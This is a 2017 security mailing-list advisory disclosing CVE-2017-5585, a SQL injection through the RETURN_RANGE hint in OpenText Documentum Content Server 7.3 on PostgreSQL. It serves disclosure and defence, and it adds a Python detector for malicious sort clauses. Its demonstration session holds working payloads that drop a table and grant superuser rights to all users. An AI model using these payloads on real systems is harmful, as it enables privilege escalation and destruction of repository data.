Open Source and information security mailing list archives
Date: Thu, 16 Feb 2017 01:18:03 +1100
From: "Andrey B. Panfilov" <andrew@...filov.tel>
To: "'bugtraq@...urityfocus.com'" <bugtraq@...urityfocus.com>
Subject: CVE-2017-5585: SQL injection in OpenText Documentum Content Server 7.3 (PostgreSQL builds only)

CVE Identifier: CVE-2017-5585
Vendor: OpenText
Affected products: OpenText Documentum Content Server 7.3 (PostgreSQL builds only)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available

Description:

The previously announced fix for CVE-2014-2520 appears to be incomplete: when a PostgreSQL database is used and the return_top_results_row_based config option is set to false, Content Server does not properly restrict DQL hints. The string argument of the RETURN_RANGE hint is copied into the generated SQL unchecked, which allows remote authenticated users to conduct DQL injection attacks and execute arbitrary DML/DDL statements on the target system via a crafted request.

Demonstration:

================================================================8<==============================================================
Connecting to Server using docbase DCTM_PSQL
[DM_SESSION_I_SESSION_START]info:  "Session 0102987880002902 started for user dm_bof_registry."


Connected to Documentum Server running Release 7.3.0000.0214  Linux64.Postgres
--
-- Amount of superusers in Documentum repository
--
1> select count(*) from dm_user where user_privileges=16
2> go
count       
------------
           1
(1 row affected)


--
-- Demonstration of how Content Server translates the DQL query to SQL
--
1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;')
2> go
[DM_QUERY_E_CURSOR_ERROR]error:  
   "A database error has occurred during the creation of a cursor 
   (' STATE=2BP01, CODE=7, MSG=ERROR: cannot drop table dm_user_s because other objects depend on it;
   Error while executing the query')."


1> exec get_last_sql
2> go
result
-------------------------------------------------------------------------------------------


select all CAST(count(*) as int) from dm_user_sp  dm_user order by 1;drop table dm_user_s; 1321 Commit 1321 Commit


(1 row affected)


--
-- Exploitation
--
1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;update dm_user_s set user_privileges=16;')
2> go
count       
------------
          67
(1 row affected)


--
-- Amount of superusers in Documentum repository after exploitation
--
1> select count(*) from dm_user where user_privileges=16
2> go
count       
------------
          67
(1 row affected)
1> 
================================================================>8==============================================================
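As an added defensive example (not part of this advisory and not Content Server's own code), the following Python snippet flags DQL statements whose RETURN_RANGE sort clause carries anything beyond plain ORDER BY terms, which is exactly what the payloads in the session above do. The hint grammar (RETURN_RANGE start end 'sort clause') and the column/direction whitelist are assumptions drawn from the advisory's own examples, and the sample queries are constructed for the demonstration.

```python
import re

# Matches the sort-clause string argument of a DQL RETURN_RANGE hint, e.g.
# ENABLE (RETURN_RANGE 1 10 'object_name ASC'). Grammar is assumed from the
# advisory's examples: RETURN_RANGE <start> <end> '<sort clause>'.
RETURN_RANGE_RE = re.compile(
    r"RETURN_RANGE\s+(\d+)\s+(\d+)\s+'((?:[^']|'')*)'",
    re.IGNORECASE,
)

# One ORDER BY term: a column reference (optionally table-qualified) or a
# positional column number, with an optional ASC/DESC direction.
SORT_TERM_RE = re.compile(
    r"^\s*(?:[A-Za-z_][A-Za-z0-9_]*(?:\.[A-Za-z_][A-Za-z0-9_]*)?|\d+)"
    r"(?:\s+(?:ASC|DESC))?\s*$",
    re.IGNORECASE,
)


def return_range_sort_clauses(dql: str) -> list:
    """Return every sort-clause string passed to a RETURN_RANGE hint in dql."""
    return [m.group(3) for m in RETURN_RANGE_RE.finditer(dql)]


def sort_clause_is_safe(clause: str) -> bool:
    """True only if the clause is a comma-separated list of plain ORDER BY terms.

    A statement separator (';'), an embedded quote, or anything other than
    identifier/position plus direction fails the check.
    """
    if ";" in clause or "'" in clause or not clause.strip():
        return False
    return all(SORT_TERM_RE.match(term) for term in clause.split(","))


def classify_dql(dql: str) -> str:
    """Classify a DQL statement for logging or blocking at a proxy/audit layer."""
    clauses = return_range_sort_clauses(dql)
    if not clauses:
        return "no-return-range"
    if all(sort_clause_is_safe(c) for c in clauses):
        return "ok"
    return "suspicious"


# Constructed sample queries: two benign, two taken from the advisory above.
SAMPLE_QUERIES = [
    "select count(*) from dm_user where user_privileges=16",
    "select object_name from dm_document ENABLE (RETURN_RANGE 1 10 'object_name ASC, r_object_id')",
    "select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;')",
    "select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;update dm_user_s set user_privileges=16;')",
]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(f"{classify_dql(q):<16} {q}")
```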



Disclosure timeline:

2014.02.22: Vulnerability discovered
2017.01.25: CVE Identifier assigned
2017.02.01: Vendor contacted, no response
2017.02.15: Public disclosure


__
Regards,
Andrey B. Panfilov


